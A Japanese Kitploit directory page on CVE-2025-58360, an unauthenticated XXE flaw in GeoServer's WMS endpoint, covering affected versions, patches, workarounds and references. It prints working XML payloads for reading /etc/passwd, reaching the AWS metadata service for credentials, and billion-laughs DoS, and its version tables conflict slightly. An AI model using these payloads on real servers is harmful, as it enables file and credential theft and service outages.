Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Blackash-CVE-2025-58360 — CVE-2025-58360 | Kitploit
ツール/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

リポジトリを見る
8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔓 🛰️ 'CVE-2025-58360' GeoServer WMSエンドポイントがXXE攻撃に対して脆弱 🌟

GeoServer

🏷️ 基本情報

  • CVE ID: CVE-2025-58360
  • 公開日: 📅 2025年11月25日
  • 最終更新日: 📅 2025年11月25日(11月26日時点でまだ新しい)
  • 脆弱性タイプ: XML External Entity (XXE) – CWE-611
  • 影響を受けるソフトウェア: GeoServer(Javaで書かれたオープンソースの地理空間サーバー)
  • 深刻度: 🔥 高 – CVSS v3.1 Base Score 7.5
    • Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • 実際の悪用: 🟡 まだ確認されていません(2025年11月26日時点)– しかし公開PoCが出回っています
  • 認証の必要性: ❌ 不要 – 完全に認証不要
  • ユーザーインタラクションの必要性: ❌ 不要

🎨 このバグが特別(そして危険)な理由

これはWeb Map Service(WMS)GetMapエンドポイントにおける古典的だが壊滅的なXXEです。
攻撃者は以下が可能です:

  • 📂 GeoServerプロセスがアクセスできる任意のファイルを読み取る(/etc/passwd、geoserver.xml、秘密鍵など)
  • 🌐 Server-Side Request Forgery(SSRF) を実行し、内部ネットワークをスキャンしたり、メタデータエンドポイント(例:AWS/GCP)にアクセスする
  • 💣 エンティティ展開攻撃("billion laughs")によるサービス拒否(DoS) を引き起こす
  • 🔗 他の脆弱性と連鎖させて完全なRCEを達成する可能性(直接ではないが、設定ミスがある環境では可能性あり)

🛡️ 影響を受けるバージョン(詳細表)

🌍 グローバルな露出状況(2025年11月26日時点のリアルタイム)

→ 現在、数万の潜在的に脆弱なサーバーがオープンインターネット上に存在しています!🌐

🧨 完全な技術的エクスプロイト解説

エンドポイント: POST /geoserver/wms
キーパラメータ: SLD_BODY(生のXMLスタイルを許可)
脆弱なコードパス: XMLパーサーが外部エンティティ解決を無効にしていない → 古典的なXXE。

f77f64d7c92fd31b29d537f5205da524

例1 – ファイル開示(/etc/passwd)

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
  <sld:UserLayer>
    <sld:LayerFeatureConstraints>
      <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
    </sld:LayerFeatureConstraints>
  </sld:UserLayer>
</sld:StyledLayerDescriptor>

→ レスポンスに /etc/passwd の内容が含まれます 🎉

例2 – 内部メタデータへのSSRF(AWSの例)

root@kitploit:~
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

→ EC2上で実行している場合、一時的なAWS認証情報が漏洩します。

例3 – Billion Laughs DoS

root@kitploit:~
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!-- lol9まで繰り返し -->
]>
<lol>&lol9;</lol>

→ 数秒で数ギガバイトのRAMを消費します 💥

🛠️ 公式パッチとダウンロード

バージョンリリース日ダウンロードリンク
2.27.02025年11月25日https://geoserver.org/release/stable/
2.26.32025年11月25日

Dockerユーザー向け:

root@kitploit:~
docker pull osgeo/geoserver:2.27.0

🔧 回避策(すぐにパッチを適用できない場合)

  1. WAF/mod_securityルールで危険なXMLをブロック:
    <!ENTITY または SYSTEM "file://" を含むリクエストを拒否
  2. SLD_BODYパラメータをグローバルに無効化(不要な場合)
  3. GeoServerを読み取り専用ファイルシステムで実行 + ケーパビリティを削除
  4. リバースプロキシの背後に配置し、認証されていないユーザーからのXML本文を除去

📢 公式リファレンスとPoC

  • NVDエントリ: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
  • GeoServerセキュリティアドバイザリ: https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
  • JIRAチケット: https://osgeo-org.atlassian.net/browse/GEOS-11682
  • 公開安全PoC(Python): https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
  • Nucleiテンプレート(自動検出): メインブランチに既にマージ済み

⏰ タイムライン

日付イベント
2025年11月以前XBOW AIスキャナーによって自律的に発見
2025年11月25日調整された開示 → パッチリリース
2025年11月25日CVE割り当て・公開
2025年11月26日PoCが拡散し、露出スキャンが急増

✨ 最後に

これは、広く展開されている地理空間プラットフォームを標的とし、数万ものインターネットに露出したインスタンスが影響を受ける教科書的なXXEです。
パッチは開示と同日にリリースされました — GeoServerチームの迅速な対応に大きな拍手を!🏆
しかし、パッチが利用可能になってから大規模な悪用が始まるまでの猶予は急速に縮まっています。

GeoServerを運用している場合 → 今すぐアップグレードを。
次のニュースの見出しにならないでください。

セキュリティを保ち、輝き続けましょう!🛡️✨

ツールをダウンロード
コンポーネント脆弱なバージョン修正バージョンステータス
GeoServer Standalone2.26.0 – 2.26.1
≤ 2.25.5
2.26.3, 2.25.6, 2.27.0🔴 脆弱
Docker (osgeo/geoserver)2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.27.0🔴 脆弱
Maven org.geoserver:gs-wms2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 脆弱
Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 脆弱
GeoServer 2.27.x 以降–既にパッチ済み✅ 安全
ソース露出インスタンス数備考
ZoomEye~49,400app:"GeoServer" 検索
FOFA~24,000過去1年間の結果
Shodan~31,000ポート8080 + タイトル一致
GobySec~20,000公開ネットワークスキャン
メンテナンスブランチパッチ
2.25.62025年11月25日旧サポートブランチ